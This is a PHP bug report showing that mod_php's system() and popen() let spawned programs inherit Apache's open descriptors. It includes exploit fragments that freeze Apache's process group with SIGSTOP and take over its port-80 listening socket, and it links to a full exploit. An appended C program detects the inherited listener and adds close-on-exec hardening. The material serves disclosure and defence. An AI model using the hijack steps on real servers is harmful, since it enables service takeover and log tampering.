From: dimmoborgir at gmail dot com
Operating system: UNIX
PHP version: 5.2.0RC4
PHP Bug Type: Apache2 related
Bug description: mod_php: system() (and similar) don't cleanup opened handles
of Apache
Description:
------------
The problem is in the exec, system, popen (and similar) PHP functions. The
fact is that PHP doesn't sanitize open file descriptors before executing
a program.
These functions use the popen() C function to spawn a program.
popen() is equal to the successive execution of
pipe(), fork(), dup2(), exec().
These functions keep all open handles (except STDOUT, which is replaced
with the pipe).
This bug makes php-include vulnerabilities more dangerous.
If the server uses mod_php and we can execute shell commands via
system(), then we can, e.g., stop the Apache processes (by sending a SIGSTOP)
and listen for and process connections on port 80 (opened by Apache and
passed to us by PHP). Also we can write anything to its error log.
Reproduce code:
---------------
Some steps to reproduce the bug.
First, a simple program to wait :)
# cat test1.c
#include <unistd.h>   /* setsid(), sleep() */

/* Detach into its own session and sleep, so the descriptors inherited
   from Apache stay open long enough to inspect with lsof. */
int main( void )
{
    setsid( );
    sleep( 10000 );
    return 0;
}
# gcc -o test1 test1.c
Ok. Let's make a php script:
#cat a.php
<?php
system( "./test1" );
?>
Request: http://127.0.0.1/a.php
Good. Now look at the open handles:
#lsof | grep test1
test1 cwd DIR /usr/local/apache2/htdocs
test1 rtd DIR /
test1 txt REG /var/www/html/test1
test1 mem REG /lib/tls/libc-2.3.5.so
test1 mem REG /lib/ld-2.3.5.so
test1 mem REG [stack] (stat: No such file or directory)
test1 0r CHR /dev/null
test1 1w FIFO pipe
test1 2w REG /usr/local/apache2/logs/error_log
test1 3u IPv4 *:http (LISTEN)
test1 4r FIFO pipe
test1 5w FIFO pipe
test1 6w REG /usr/local/apache2/logs/error_log
test1 7w REG /usr/local/apache2/logs/access_log
test1 8r 0000 unknown inode type
test1 9u IPv4 10.0.0.2:http->10.0.0.1:2134 (CLOSE_WAIT)
So, our test1 has Apache's handles. Now we can do something like this:
#include <signal.h>    /* kill(), SIGSTOP */
#include <unistd.h>    /* getsid(), setsid() */

pid_t p = getsid( 0 );  // get current Process Group Id
setsid( );              // become session leader
kill( -p, SIGSTOP );    // good night, Apache Process Group :)
And after that:
#include <sys/socket.h> /* listen() */
#include <unistd.h>     /* getdtablesize() */

int sock;
for ( sock = 3; sock < getdtablesize( ); sock++ ) // find valid socket handle
    if ( listen( sock, 10 ) == 0 ) break;
Full exploit is available on http://hackerdom.ru/~dimmo/phpexpl.c
Expected result:
----------------
I didn't expect a program executed via the system() PHP function to have all
the open descriptors of the Apache web server (including port 80, error and
access logs, open connections, etc.).
Actual result:
--------------
Our PHP program has all the descriptors of the Apache server.
--
Edit bug report at http://bugs.php.net/?id=38915&edit=1
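The following is an added example, not code from the bug report, from PHP or from Apache. It reproduces the two halves of the report in one self-contained C program: the discovery step (scanning the inherited descriptor table for a socket in LISTEN state, which the exploit does by calling listen() on every fd; here SO_ACCEPTCONN asks the same question without side effects) and the mitigation the report implies is missing (flagging descriptors FD_CLOEXEC so fork()+exec() cannot hand them to the spawned program). Assumptions: /bin/sh is available, and a loopback TCP listener on an ephemeral port (or a unix socket if loopback is unavailable) stands in for Apache's *:http (LISTEN) descriptor; fd_survives_exec() proves the effect by having a child shell try to dup the descriptor after exec.

```c
#include <arpa/inet.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

/* Upper bound for descriptor-table scans; sysconf() can report millions in
 * containers and each probe below is a syscall. */
static int table_size(void)
{
    long n = sysconf(_SC_OPEN_MAX);
    if (n < 0 || n > 65536) n = 65536;
    return (int)n;
}

/* 1 if fd is a socket in LISTEN state, 0 for non-sockets and closed slots.
 * SO_ACCEPTCONN is read-only, unlike the listen() probe in the report. */
int fd_is_listening_socket(int fd)
{
    int accepting = 0;
    socklen_t len = sizeof accepting;
    if (getsockopt(fd, SOL_SOCKET, SO_ACCEPTCONN, &accepting, &len) != 0)
        return 0;
    return accepting != 0;
}

/* Lowest listening socket >= lowfd, or -1: what a program spawned through
 * system() finds in the table it inherited from the web server. */
int find_inherited_listener(int lowfd)
{
    int maxfd = table_size();
    for (int fd = lowfd; fd < maxfd; fd++)
        if (fd_is_listening_socket(fd))
            return fd;
    return -1;
}

/* Mitigation: flag every open descriptor >= lowfd close-on-exec, so exec()
 * drops it in the child while the parent keeps using it. Returns how many
 * descriptors were flagged. */
int mark_cloexec_from(int lowfd)
{
    int maxfd = table_size(), n = 0;
    for (int fd = lowfd; fd < maxfd; fd++) {
        int flags = fcntl(fd, F_GETFD);
        if (flags == -1) continue;                       /* EBADF: not open */
        if (fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == 0) n++;
    }
    return n;
}

/* Does fd still exist after fork()+exec()? A child /bin/sh dups it onto an
 * unrelated fd; the redirection fails if exec closed it.
 * 1 = survived, 0 = closed by exec, -1 = probe could not run. */
int fd_survives_exec(int fd)
{
    char script[96];
    int target = (fd == 9) ? 8 : 9;   /* never dup a descriptor onto itself */
    snprintf(script, sizeof script,
             "exec 2>/dev/null %d<&%d || exit 1; exit 0", target, fd);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", script, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    if (WEXITSTATUS(status) == 127) return -1;
    return WEXITSTATUS(status) == 0;
}

/* Stand-in for Apache's *:http (LISTEN) descriptor (assumption: loopback
 * TCP on an ephemeral port, falling back to a unix socket under /tmp). */
int make_listener(void)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd >= 0) {
        struct sockaddr_in a;
        memset(&a, 0, sizeof a);
        a.sin_family = AF_INET;
        a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        if (bind(fd, (struct sockaddr *)&a, sizeof a) == 0 && listen(fd, 5) == 0)
            return fd;
        close(fd);
    }
    fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    struct sockaddr_un u;
    memset(&u, 0, sizeof u);
    u.sun_family = AF_UNIX;
    snprintf(u.sun_path, sizeof u.sun_path, "/tmp/fdleak-%ld.sock", (long)getpid());
    unlink(u.sun_path);
    if (bind(fd, (struct sockaddr *)&u, sizeof u) == 0 && listen(fd, 5) == 0) {
        unlink(u.sun_path);        /* path gone, socket still in LISTEN state */
        return fd;
    }
    close(fd);
    return -1;
}

int main(void)
{
    int lfd = make_listener();
    if (lfd < 0) return 1;
    printf("listener is fd %d; first inherited listener from fd 3: %d\n",
           lfd, find_inherited_listener(3));
    printf("survives exec before FD_CLOEXEC: %d\n", fd_survives_exec(lfd));
    mark_cloexec_from(3);
    printf("survives exec after FD_CLOEXEC:  %d\n", fd_survives_exec(lfd));
    return 0;
}
```

The scan is what a spawned program can do with nothing but the inherited table: once it has found the listening socket it can accept() on it after stopping the server's processes, exactly as the report describes. Flagging descriptors close-on-exec (or closing everything above 2 in the child between fork() and exec()) is the hardening that makes system()-style spawning safe regardless of what the parent has open; the parent's own use of the descriptors is unaffected because FD_CLOEXEC only acts at exec() time.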